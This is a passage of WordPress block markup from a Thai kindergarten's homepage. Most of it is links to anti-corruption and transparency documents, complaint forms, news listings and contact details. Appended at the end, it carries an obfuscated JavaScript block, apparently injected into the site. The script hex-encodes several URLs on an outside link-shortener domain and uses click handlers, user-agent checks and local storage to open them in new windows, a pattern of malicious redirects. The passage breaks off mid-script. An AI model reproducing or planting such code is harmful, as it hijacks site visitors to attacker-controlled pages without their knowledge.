data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return 